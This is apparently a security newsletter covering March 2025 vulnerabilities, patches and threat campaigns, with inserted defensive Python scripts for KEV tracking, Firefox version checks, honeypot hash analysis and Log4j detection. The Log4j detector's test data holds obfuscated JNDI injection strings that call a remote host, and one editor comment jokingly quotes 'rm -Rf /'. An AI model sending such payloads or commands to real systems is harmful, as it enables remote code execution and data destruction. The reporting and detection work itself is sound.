Apple has patched a zero-day vulnerability in the Webkit browser engine after receiving a report of its exploitation in "an extremely sophisticated attack against targeted individuals." CVE-2025-24201, still awaiting CVSS assessment, would allow an attacker to break out of the Web Content sandbox using maliciously crafted web content, due to an out-of-bounds write issue in versions of iOS before iOS 17.2. Apple notes the update "is a supplementary fix for an attack that was blocked in iOS 17.2," fixed in iOS and iPadOS 18.3.2, with improved checks to prevent unauthorized actions. Devices impacted are "iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later." Dan Goodin at Ars Technica posits that "users facing the biggest threat are likely those who are targets of well-funded law enforcement agencies or nation-state spies."
If you have Apple Intelligence disabled: Double-check after applying the patch to ensure that it is still disabled.
Apple fixes to iOS are fairly timely and non-disruptive. Most Apple users should enable automatic updates. Development tools may deserve a little more scrutiny.
You almost forget that Safari has such a significant dominance in the market, but it does. Patching your device would be the obvious thing, but it's common for users not to fix their iPhones.
The same flaw is addressed in Safari 18.3.1, MacOS 15.3.2, and visionOS 2.3.2. Note watchOS gets a pass this time. Apple says this is being exploited actively.
Tuesday, March 11, saw security updates from Microsoft, Adobe, and Apple. Microsoft released updates to address more than 50 vulnerabilities, including six that are already being actively exploited; all six are rated important. Six other vulnerabilities are deemed critical. Adobe released updates to address 35 security issues in a range of their products, including nine issues affecting Reader and Acrobat.
While there are only 51 flaws addressed this cycle, at least five are in the NIST KEV. Make plans to get them deployed by the end of March to meet the KEV timetable. Even so, with updates from Microsoft, Apple, Ivanti and Juniper, don't overlook the Adobe Acrobat/Acrobat Reader update. This affects both the DC and older classic versions. Take a look at updating those classic versions to DC for consistency and ongoing support.
(This is me, not complaining about software quality and not pointing out once again that patching is an inefficient way to achieve it. The cost of both risk and that of routine patching is part of the cost of the software and may exceed the cost of the license.)
SANS ISC
Krebs on Security
The Register
SecurityWeek
SC World
Adobe
The US Cybersecurity and Infrastructure Security Agency (CISA) has added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog: three critical flaws affecting Ivanti Endpoint Manager (EPM), and two high-severity flaws affecting Advantive VeraCore. CVE-2024-13159, CVE-2024-13160, and CVE-2024-13161, all assigned CVSS score 9.8 by Ivanti and patched in January 2025, allow an attacker to leak sensitive information via absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update. No details of known exploits have been publicly provided. CVE-2024-57968, CVSS score 8.8, allows a remote authenticated user "to upload files to unintended folders (e.g., ones that are accessible during web browsing by other users)," due to an unrestricted file upload vulnerability in Advantive VeraCore before 2024.4.2.1. CVE-2025-25181, CVSS score 7.5, allows a remote user to execute arbitrary SQL commands via the PMSess1 parameter due to an SQL injection vulnerability in timeoutWarning.asp in Advantive VeraCore through 2025.1.0. The Hacker News reports that "the exploitation of VeraCore vulnerabilities has been attributed to likely a Vietnamese threat actor named XE Group." Federal Civilian Executive Branch (FCEB) agencies must apply patches for all five flaws by March 31, 2025.
The three Ivanti vulnerabilities were widely reported in January and a patch made available. If one were to apply a standard of care, the patch should have been applied by now by all affected organizations, regardless of adding them to the KEV.
It should come as no surprise the Apple WebKit flaw and Juniper OS flaw were also added to the KEV. These are all (Apple, Juniper, Ivanti, Microsoft and VeraCore) due between March 31st and April 3rd.
CISA
Ivanti
The Hacker News
SecurityWeek
Bleeping Computer
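The KEV item above turns on two questions a defender has to answer repeatedly: which catalog entries touch products we actually run, and how many days remain before each remediation deadline. The script below is an added example, not CISA's tooling or anything from the sources listed; the field names follow the JSON schema CISA publishes for the catalog, but every catalog record and every inventory row is constructed (the CVE identifiers and the March 31 due date are taken from the item, the dateAdded values are placeholders).

```python
"""Match a CISA KEV catalog export against an asset inventory and compute
remediation deadlines. Added example: field names follow CISA's published
known_exploited_vulnerabilities.json schema; all records are constructed."""
import json
from datetime import date

# Constructed sample in the shape of CISA's catalog export. The five CVEs and the
# 2025-03-31 FCEB due date come from the news item; dateAdded is a placeholder.
KEV_JSON = """{
  "title": "Constructed KEV sample",
  "catalogVersion": "2025.03.10",
  "vulnerabilities": [
    {"cveID": "CVE-2024-13159", "vendorProject": "Ivanti", "product": "Endpoint Manager (EPM)",
     "dateAdded": "2025-03-10", "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-13160", "vendorProject": "Ivanti", "product": "Endpoint Manager (EPM)",
     "dateAdded": "2025-03-10", "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-13161", "vendorProject": "Ivanti", "product": "Endpoint Manager (EPM)",
     "dateAdded": "2025-03-10", "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-57968", "vendorProject": "Advantive", "product": "VeraCore",
     "dateAdded": "2025-03-10", "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-25181", "vendorProject": "Advantive", "product": "VeraCore",
     "dateAdded": "2025-03-10", "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown"}
  ]
}"""

# Constructed asset inventory, written the way a CMDB export usually looks:
# vendor and product as free text, not as CPE strings.
INVENTORY = [
    {"host": "epm-01", "vendor": "Ivanti", "product": "Endpoint Manager"},
    {"host": "wms-02", "vendor": "Advantive", "product": "VeraCore"},
    {"host": "web-01", "vendor": "Apache", "product": "HTTP Server"},
]


def load_catalog(text):
    """Parse a KEV export and convert the ISO date strings to date objects."""
    entries = []
    for v in json.loads(text)["vulnerabilities"]:
        e = dict(v)
        e["dueDate"] = date.fromisoformat(v["dueDate"])
        e["dateAdded"] = date.fromisoformat(v["dateAdded"])
        entries.append(e)
    return entries


def product_matches(entry, asset):
    """Heuristic match: vendor must be equal (case-insensitive) and one product
    string must contain the other, so 'Endpoint Manager' hits 'Endpoint Manager (EPM)'."""
    if entry["vendorProject"].lower() != asset["vendor"].lower():
        return False
    a, b = entry["product"].lower(), asset["product"].lower()
    return a in b or b in a


def remediation_queue(entries, inventory, as_of):
    """Return one work item per (host, CVE) pair, most urgent first.
    as_of is an ISO date string; negative days_left means the deadline has passed."""
    today = date.fromisoformat(as_of)
    queue = []
    for asset in inventory:
        for e in entries:
            if product_matches(e, asset):
                queue.append({
                    "host": asset["host"],
                    "cveID": e["cveID"],
                    "dueDate": e["dueDate"].isoformat(),
                    "days_left": (e["dueDate"] - today).days,
                })
    return sorted(queue, key=lambda q: (q["days_left"], q["cveID"]))


def overdue(queue):
    """Items whose KEV due date is already in the past."""
    return [q for q in queue if q["days_left"] < 0]


if __name__ == "__main__":
    work = remediation_queue(load_catalog(KEV_JSON), INVENTORY, "2025-03-20")
    for item in work:
        print(f'{item["host"]:8} {item["cveID"]:16} due {item["dueDate"]} ({item["days_left"]:+d} days)')
    print("overdue:", len(overdue(work)))
```

The substring match is deliberately loose because KEV vendor and product names are free text and rarely line up with inventory spelling; treat its output as a candidate list and confirm by version before closing a ticket. Swapping the constructed `KEV_JSON` for the file CISA publishes, and `INVENTORY` for a CMDB export, is the only change needed to run this against real data.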
On March 13, 2025, three UK civil liberties organizations -- the Open Rights Group (ORG), Big Brother Watch, and Index on Censorship -- published a joint open letter to Lord Justice Singh, president of the UK's Investigatory Powers Tribunal (IPT), which on Friday, March 14, 2025 will hold a closed-door hearing of Apple's appeal of a Technical Capability Notice (TCN) to create a backdoor in the company's Advanced Data Protection for the UK government. The organizations mention their involvement in similar cases involving the IPT and TCNs, and urge disclosure of the government's basis for "compel[ling] a private company to undermine the privacy and security of its customers," noting the impossibility of targeted breaks in end-to-end encryption (E2EE). The letter cites a European Court of Human Rights (ECtHR) ruling stating that the harm of obliging E2EE decryption threatens to unacceptably weaken encryption to an extent "not proportionate to the legitimate aims pursued." Finally, the letter argues the IPT's secrecy is unjustified by its obligations and legal precedents, stating that "the public interest lies in conducting this hearing in public."
In this case, the law has been written in such a way as to resist public scrutiny. That in itself is problematic.
Continue to keep an eye on this with consideration to any precedent it may set. This latest move, beyond restating the concerns over weakened security, calls for public view of the request and hearing. Transparency is important when it comes to making a case that the government's needs are better served through impacting a private company's security protections.
It's time to see whether the UK Government blinks and rescinds the TCN. I suspect not, given the capability requirement is enshrined in law. If that turns out to be the case, expect other countries to follow with similar laws. As a reminder, there is currently a bill in committee in Sweden's Riksdag, mandating backdoor access to both Signal and WhatsApp applications.
A Mozilla root certificate is set to expire on Friday, March 14, 2025, which will cut off the functionality and security of Firefox add-ons, signed content, and DRM-protected media playback unless users update to Firefox version 128 (ESR 115.13) or later. According to Mozilla, using Firefox with an expired root certificate puts users at risk from malicious add-ons and revoked or fraudulent security certificates due to out-of-date blocklists and revocation lists, as well as from unavailability of alerts about compromised credentials. Windows, macOS, Linux, and Android users using Firefox or Firefox-based browsers must apply the update, but iOS users do not need to take any action.
Every year or so we have an item about customer-facing certs expiring and impacting business. Use this one to stay ahead of that - do you know where all your certs are?
Firefox 128 (and ESR 115.13) were released July 9th, and Firefox 136/ESR 128.8.0 were released March 4th; you should be well past the minimum required versions at this point. Even so, it's a good time to scan for laggers and move them up.
After everyone went wild with Certificates, this is *yet another* system where root certificates need to be refreshed and will require an update. Could you update Firefox if you are still using it?
It is always a good security practice to update to the latest software version as it becomes available. Firefox version 128 was released almost a year ago. Firefox updates automatically by default, even when the browser is not running. That said, it's best to check as there is a 'disableappupdate' configuration setting available to users.
Mozilla
The Register
The Hacker News
Bleeping Computer
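The Mozilla item gives a concrete floor (Firefox 128, or ESR 115.13 on the 115 extended-support branch), and the practical task is finding the installs below it. The checker below is an added example, not Mozilla's code; the version-string shapes it parses (`136.0`, `127.0.2`, `115.13.0esr`) are the ones Firefox reports, while the hostnames and versions in the inventory are constructed.

```python
"""Flag Firefox installs below the version floor stated by Mozilla for the
root certificate expiry: 128 on the rapid-release stream, or ESR 115.13 on the
115 extended-support branch. Added example; inventory data is constructed."""
import re

MIN_RAPID = (128, 0, 0)     # Firefox 128 or later, per Mozilla's guidance
MIN_ESR_115 = (115, 13, 0)  # ESR 115.13 or later on the 115 branch

# Firefox version strings look like "136.0", "127.0.2" or "115.13.0esr".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(esr)?$")


def parse_version(s):
    """Return ((major, minor, patch), is_esr); raise on anything unrecognised
    rather than silently treating a bad string as compliant."""
    m = VERSION_RE.match(s.strip().lower())
    if not m:
        raise ValueError(f"unrecognised Firefox version string: {s!r}")
    major, minor, patch, esr = m.groups()
    return (int(major), int(minor), int(patch or 0)), esr is not None


def meets_minimum(s):
    """True if the install satisfies either branch's floor.
    ESR 128.x is simply >= 128, so only ESR 115.x needs the special case."""
    version, is_esr = parse_version(s)
    if is_esr and version[0] == 115:
        return version >= MIN_ESR_115
    return version >= MIN_RAPID


# Constructed fleet inventory: (hostname, Firefox version as reported by the client).
INVENTORY = [
    ("ws-001", "136.0"),
    ("ws-002", "115.13.0esr"),
    ("ws-003", "115.12.0esr"),
    ("ws-004", "127.0.2"),
    ("ws-005", "128.8.0esr"),
    ("ws-006", "91.13.0esr"),
]


def laggards(inventory):
    """Hosts that still need the update, in inventory order."""
    return [(host, ver) for host, ver in inventory if not meets_minimum(ver)]


if __name__ == "__main__":
    for host, ver in laggards(INVENTORY):
        print(f"{host}: Firefox {ver} is below the required minimum")
```

Note that a non-ESR 115.x build does not get the ESR exception: the 115 rapid-release train was superseded long before 128, so such an install fails the `>= 128` test, which is the right outcome.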
PowerSchool has released a February 2025 report by CrowdStrike describing their month-and-a-half-long investigation of the December 2024 data breach of PowerSchool's Student Information System (SIS). CrowdStrike confirmed that the threat actor gained access to the PowerSource portal using a single compromised set of support credentials, using "Maintenance Remote Support operations" to access schools' SIS instances. The threat actor maintained unauthorized access between December 19 and December 28, 2024, and exfiltrated data from "Teachers" and "Students" tables in SIS. System-layer access, malware, and lateral movement to environments outside of PowerSource and SIS were not detected, nor did CrowdStrike observe exfiltrated data for sale on the dark web. The same compromised credentials were used to access the PowerSource portal between August 16 and September 17, 2024, but CrowdStrike cannot confirm this was done by the same threat actor, and "log data did not go back far enough to show whether the August and September activity included unauthorized access to PowerSchool SIS data." The report notes that apart from employing CrowdStrike tools, PowerSchool has deactivated the compromised credential; reset employee and contractor passwords; and secured and limited access to the PowerSource portal, mandating access through a VPN requiring single sign-on and multi-factor authentication.
If your organisation has Internet facing portals then this report is a must read. Learn from this report and ensure the remediation steps, and lessons learnt from this breach, are applied to your organisation.
A 'compromised credential' enabled the compromise; apparently remote access with reusable passwords was allowed. This should be a go/no-go question for outsourcing decisions, including 'Anything as a Service' offerings. Explicitly require a statement from all vendors that phishing-resistant MFA is used by all privileged accounts - service providers are high-leverage and constantly targeted.
I'm glad to see this level of detail publicly available. It appears from reading the scant report that the system's administrative interfaces were fully available over the Internet. While a VPN with MFA is a best practice, it's also unclear if they are highlighting the fact that it's a best practice or if they lack a VPN with MFA. Either way, it's a simple read, and I recommend just walking through it.
It is both common and risky in IT to put controls intended for the exclusive use of management right next to those provided for unprivileged users. Smart people do not do that.
PowerSchool
PowerSchool
Bleeping Computer
Juniper Networks has released a bulletin noting updates and mitigations for a vulnerability in Junos OS MX routers that have reached end-of-life (EOL), following Mandiant's discovery of six custom variations of TINYSHELL backdoor malware operating on EOL Junos OS routers. CVE-2025-21590 allows a local attacker with shell access to inject arbitrary code and compromise the device due to an improper isolation or compartmentalization vulnerability in the Junos OS kernel. Mandiant's report shows how a threat actor tracked as UNC3886 exploited this vulnerability to circumvent the Verified Exec (veriexec) subsystem protecting the OS against unauthorized code and deploy the backdoors. Each of the six backdoors pairs TINYSHELL functionality with a different set of malicious capabilities and activation methods. Mandiant provides Indicators of Compromise (IOCs) and YARA Rules, and recommends organizations update Juniper devices and run the Juniper Malware Removal Tool (JMRT); implement secure authentication; strictly manage network configuration; monitor activity closely; prioritize patching; focus on device lifecycle management; harden security; and "proactively leverage threat intelligence."
Juniper
The Register
Bleeping Computer
The Hacker News
Researchers from Kaspersky's Global Research and Analysis Team (GReAT) have noted recent activity attributed to the advanced persistent threat (APT) group dubbed Sidewinder, notably focusing on maritime targets, logistics targets, and the nuclear sector, in spear phishing email campaigns primarily across Africa and South Asia. The targeted lure email contains a DOCX attachment that "uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker," then exploiting a known Microsoft Office flaw to install a "Backdoor Loader" which in turn loads Sidewinder's custom "post-exploitation toolkit." CVE-2017-11882, patched since 2017, is a memory corruption vulnerability affecting older versions of Microsoft Office, allowing an attacker to run arbitrary code when objects are not properly handled in memory. Kaspersky urges regular software updates and anti-phishing employee training.
Beyond putting phishing awareness campaigns in place, make sure you're not neglecting package updates; this campaign is leveraging a flaw from 2017. Check for users holding onto down-rev versions which may have flaws not easily mitigated. Verify if the issues are real or perceived.
Researchers from Microsoft Threat Intelligence have "identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry" to steal information that can be used to commit financial fraud. In a report published this week, Microsoft Threat Intelligence describes the campaign, which involves fraudulent emails that attempt to manipulate people and organizations in the hospitality industry into performing actions that result in malware being executed. Microsoft writes that "as of February 2025, this campaign is ongoing." The report includes recommendations and detection details.
Good reminder to make sure your awareness/education program explicitly says 'no legitimate email will ever ask you to copy, paste, and launch commands.'
Email is still a vector, as many email systems make you click links. This one leverages bookings.com, but we have seen this with other systems. The vector here is novel, and you are asked to copy/paste it into a terminal. You end up attacking yourself. The people on IRC can help. They keep telling me to type rm -Rf / into my terminal, but my computer reboots.
Note to self: Hospitality industry is not Healthcare industry. The actors are targeting the sector with fake booking.com reports of bad reviews including links to entice positive reviews. As reliant as their services are on positive feedback, these should be considered highly targeted and essentially impossible to resist. Guidance and inline (EDR/Boundary protections) are going to play heavily in heading off this attack.
A case study from Dragos describes how they helped the Littleton (Massachusetts) Electric Light and Water Departments (LELWD) remove Volt Typhoon's presence from their network. In November 2023, the US Federal Bureau of Investigation notified LELWD of intruders in their network. LELWD then brought in Dragos, who determined that the China-based threat actors had had a presence in LELWD's network since February 2023. Dragos writes, "the significance of the discovery of this attack is that it highlights that the adversary not only aimed to maintain persistent access to the victim's environment for a long tenure, but also were aiming to exfiltrate specific data related to OT operating procedures and spatial layout data relating to energy grid operations."
The Dragos document is more of a customer testimonial than an incident report - no info on how the attackers gained initial access, and there seem to have been no public statements from LELWD since no citizen data was exposed. Another key point: apparently a grant from the American Public Power Association enabled Littleton to get to the point where the compromise was detected with Dragos tools. 22% of APPA's funding has come from federal government agencies and may be at risk under the current government cutting actions. APPA has done very good work in the past.
Detected activity like this by Volt Typhoon has kicked off an initiative by the US and other governments to harden critical infrastructure. The best defense against this sort of attack, beyond keeping entry points patched and hardened, is to monitor for unusual behavior, particularly lateral movement. Volt Typhoon leverages existing tools (LOTL) rather than installing new malware you could detect.
If the attacker's objective, plan, and tools include persistence and he is not discovered for weeks to months, successfully "removing" will be costly, and success difficult to know.
Dragos
The Record
The Register
DarkReading
SecurityWeek
SANS Internet StormCast Friday, March 14, 2025
File Hashes in MSFT BI; Apache Camel Vuln; Juniper Fixes Exploited Vuln; AMI Patches 10.0 Redfish BMC Vuln
https://isc.sans.edu/podcastdetail/9364
File Hashes Analysis with Power BI
Guy explains in this diary how to analyze Cowrie honeypot file hashes using Microsoft's BI tool and what you may be able to discover using this tool.
https://isc.sans.edu/diary/File+Hashes+Analysis+with+Power+BI+from+Data+Stored+in+DShield+SIEM/31764
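Before any hash data lands in Power BI it has to be pulled out of Cowrie's JSON event stream and rolled up per file, which is the step that decides what the dashboard can show: how often a sample was seen, from how many sources, and which samples are one-offs. The aggregation below is an added example and is not the code from the diary above; the event names and keys (`cowrie.session.file_download`, `cowrie.session.file_upload`, `shasum`, `src_ip`, `url`) follow Cowrie's JSON logging, while every event, address, URL and hash value is constructed.

```python
"""Roll up file hashes from Cowrie JSON logs the way a SIEM or BI tool needs
them: one row per SHA-256 with count, first/last seen, sources and origin URLs.
Added example; field names follow Cowrie's JSON output, all data is constructed."""
import hashlib
import json

# Constructed hashes: real SHA-256 digests of made-up content, so they have the right shape.
H1 = hashlib.sha256(b"constructed-sample-1").hexdigest()
H2 = hashlib.sha256(b"constructed-sample-2").hexdigest()
H3 = hashlib.sha256(b"constructed-sample-3").hexdigest()


def _ev(eventid, ts, src, session, **extra):
    """Build one constructed Cowrie log line (JSON object, one per line)."""
    rec = {"eventid": eventid, "timestamp": ts, "src_ip": src,
           "session": session, "sensor": "constructed-sensor-01"}
    rec.update(extra)
    return json.dumps(rec)


# Constructed log: three downloads of H1 from two sources, one download of H2,
# one upload of H3, a login event we ignore, and a truncated line.
COWRIE_LOG = [
    _ev("cowrie.login.success", "2025-03-12T04:15:20.000000Z", "203.0.113.10", "s001", username="root"),
    _ev("cowrie.session.file_download", "2025-03-12T04:15:22.000000Z", "203.0.113.10", "s001",
        url="http://198.51.100.7/bins.sh", shasum=H1, outfile="downloads/" + H1),
    _ev("cowrie.session.file_download", "2025-03-12T09:40:01.000000Z", "203.0.113.22", "s002",
        url="http://198.51.100.7/bins.sh", shasum=H1, outfile="downloads/" + H1),
    _ev("cowrie.session.file_download", "2025-03-13T01:02:03.000000Z", "203.0.113.10", "s003",
        url="http://198.51.100.9/x86", shasum=H1, outfile="downloads/" + H1),
    _ev("cowrie.session.file_download", "2025-03-13T02:00:00.000000Z", "203.0.113.31", "s004",
        url="http://198.51.100.9/mips", shasum=H2, outfile="downloads/" + H2),
    _ev("cowrie.session.file_upload", "2025-03-13T03:00:00.000000Z", "203.0.113.44", "s005",
        filename="update.tar", shasum=H3, outfile="downloads/" + H3),
    'this line was truncated by the collector {"eventid": "cowrie.session.file_download"',
]

EVENTS_OF_INTEREST = {
    "cowrie.session.file_download": "download",
    "cowrie.session.file_upload": "upload",
}


def parse_events(lines):
    """Keep only file transfer events that carry a hash; skip other events and bad JSON."""
    events = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        kind = EVENTS_OF_INTEREST.get(ev.get("eventid"))
        if kind and ev.get("shasum"):
            events.append({"shasum": ev["shasum"], "kind": kind, "src_ip": ev.get("src_ip"),
                           "timestamp": ev.get("timestamp"), "url": ev.get("url"),
                           "sensor": ev.get("sensor")})
    return events


def summarize(events):
    """One record per hash; ISO-8601 timestamps sort lexically, so min/max is safe."""
    summary = {}
    for ev in events:
        s = summary.setdefault(ev["shasum"], {
            "count": 0, "first_seen": ev["timestamp"], "last_seen": ev["timestamp"],
            "sources": set(), "kinds": set(), "urls": set(), "sensors": set()})
        s["count"] += 1
        s["first_seen"] = min(s["first_seen"], ev["timestamp"])
        s["last_seen"] = max(s["last_seen"], ev["timestamp"])
        s["sources"].add(ev["src_ip"])
        s["kinds"].add(ev["kind"])
        s["sensors"].add(ev["sensor"])
        if ev["url"]:
            s["urls"].add(ev["url"])
    for s in summary.values():  # sets -> sorted lists so the result is stable and serialisable
        for key in ("sources", "kinds", "urls", "sensors"):
            s[key] = sorted(s[key])
    return summary


def by_prevalence(summary):
    """Hashes ordered by sightings, then by distinct sources: commodity payloads first."""
    return sorted(summary, key=lambda h: (-summary[h]["count"], -len(summary[h]["sources"]), h))


def singletons(summary):
    """Hashes seen exactly once: the candidates worth a manual look."""
    return sorted(h for h, s in summary.items() if s["count"] == 1)


if __name__ == "__main__":
    summary = summarize(parse_events(COWRIE_LOG))
    for h in by_prevalence(summary):
        s = summary[h]
        print(f'{h[:12]}... x{s["count"]} sources={len(s["sources"])} urls={s["urls"]}')
    print("seen once:", [h[:12] for h in singletons(summary)])
```

Write `summarize()`'s output as CSV or JSON lines and Power BI will import it directly; the same rows also serve a SIEM lookup table, so a second sighting of a previously singleton hash is an event rather than a spreadsheet exercise.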
Apache Camel Vulnerability
Apache released two patches for Camel in close succession. Initially, the vulnerability was only addressed for headers, but as Akamai discovered, it can also be exploited via query parameters. This vulnerability is trivial to exploit and leads to arbitrary code execution.
Juniper Patches Junos Vulnerability
Juniper patches an already exploited vulnerability in JunOS. However, to exploit the vulnerability, an attacker already needs privileged access. By exploiting the vulnerability, an attacker may completely compromise the device.
AMI Security Advisory
AMI patched three vulnerabilities. One of them, an authentication bypass in Redfish, allows for a complete system compromise without authentication and is rated with a CVSS score of 10.0.
https://go.ami.com/hubfs/Security%20Advisories/2025/AMI-SA-2025003.pdf
SANS Internet StormCast Thursday, March 13, 2025
Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates
https://isc.sans.edu/podcastdetail/9362
Log4J Scans for VMWare Hybrid Cloud Extensions
An attacker is scanning various login pages, including the authentication feature in the VMWare HCX REST API, for Log4j vulnerabilities. The attack submits the exploit string as the username, hoping to trigger the vulnerability when Log4j logs the username.
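The detection opportunity in this item is that the payload has to travel inside a field that is logged, and no legitimate username contains Log4j lookup syntax. The checker below is an added example, not code from the ISC diary or from VMware: it scans constructed JSON authentication-log records, unwraps the `${lower:..}`, `${upper:..}` and `${key:-default}` nesting commonly used to split the lookup keyword, and classifies each username. The log format, the `/api/login` path and every address in it are assumptions.

```python
"""Flag Log4j lookup syntax submitted in an authentication field.
Added example: constructed JSON auth-log lines, assumed field names (src, path, user)."""
import json
import re

# Any ${...} lookup expression. Legitimate usernames never contain one.
LOOKUP_RE = re.compile(r"\$\{[^{}]*\}")

# Innermost transforms that attackers nest to split the keyword:
#   ${lower:X} / ${upper:X}  -> X          ${anything:-X} -> X (default value)
UNWRAP_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*?:-([^{}]*)\}")


def normalize(value):
    """Collapse nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != value:
        prev = value
        value = UNWRAP_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def classify(value):
    """'jndi-lookup' for a recognisable JNDI lookup, 'lookup-syntax' for any other
    ${...} expression (still hostile in a username), otherwise 'clean'."""
    if "${jndi:" in normalize(value).lower():
        return "jndi-lookup"
    if LOOKUP_RE.search(value):
        return "lookup-syntax"
    return "clean"


# Constructed auth-log records in an assumed JSON shape; RFC 5737 addresses throughout.
AUTH_LOG = [
    '{"ts": "2025-03-12T10:00:01Z", "src": "192.0.2.8", "path": "/api/login", "user": "alice", "result": "ok"}',
    '{"ts": "2025-03-12T10:00:02Z", "src": "198.51.100.9", "path": "/api/login", "user": "${jndi:ldap://203.0.113.5/a}", "result": "fail"}',
    '{"ts": "2025-03-12T10:00:03Z", "src": "198.51.100.9", "path": "/api/login", "user": "${${lower:j}ndi:ldap://203.0.113.5/a}", "result": "fail"}',
    '{"ts": "2025-03-12T10:00:04Z", "src": "198.51.100.9", "path": "/api/login", "user": "${${env:NaN:-j}ndi:${lower:LDAP}://203.0.113.5/a}", "result": "fail"}',
    '{"ts": "2025-03-12T10:00:05Z", "src": "198.51.100.17", "path": "/api/login", "user": "${env:USER}", "result": "fail"}',
    '{"ts": "2025-03-12T10:00:06Z", "src": "192.0.2.9", "path": "/api/login", "user": "bob.o\'brien", "result": "ok"}',
    'not json at all',
]


def scan_auth_log(lines):
    """Return (src, path, verdict, user) for every record whose username is not clean."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        verdict = classify(rec.get("user", ""))
        if verdict != "clean":
            hits.append((rec.get("src"), rec.get("path"), verdict, rec.get("user")))
    return hits


if __name__ == "__main__":
    for src, path, verdict, user in scan_auth_log(AUTH_LOG):
        print(f"{src:15} {path:12} {verdict:14} {user}")
```

Treating bare lookup syntax as an alert in its own right matters more than perfect unwrapping: obfuscation variants change, but a `${` in a username field is never benign. This only helps, of course, if the login service logs the username for failed attempts somewhere the SIEM can read it; whether the affected application is itself vulnerable is a separate question answered by patch level.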
Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who earlier disabled it. Microsoft is offering support for users whose USB printers started printing gibberish after a January patch was applied.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerability may lead to remote code execution and Adobe considers the vulnerabilities critical.
https://helpx.adobe.com/security/security-bulletin.html
Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/
FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363
SANS Internet StormCast Wednesday, March 12, 2025
Microsoft Patch Tuesday; Apple Patch; Espressif ESP32 Statement
https://isc.sans.edu/podcastdetail/9360
Microsoft Patch Tuesday
Microsoft patched six already exploited vulnerabilities today. In addition, the patches included a critical patch for Microsoft's DNS server and about 50 additional patches.
https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+March+2025/31756
Apple Updates iOS/macOS
Apple released an update to address a single, already exploited, vulnerability in WebKit. This vulnerability affects iOS, macOS and visionOS.
https://support.apple.com/en-us/100100
Espressif Response to ESP32 Debug Commands
Espressif released a statement commenting on the recent release of a paper alleging "Backdoors" in ESP32 chipsets. According to Espressif, these commands are debug commands and not reachable directly via Bluetooth.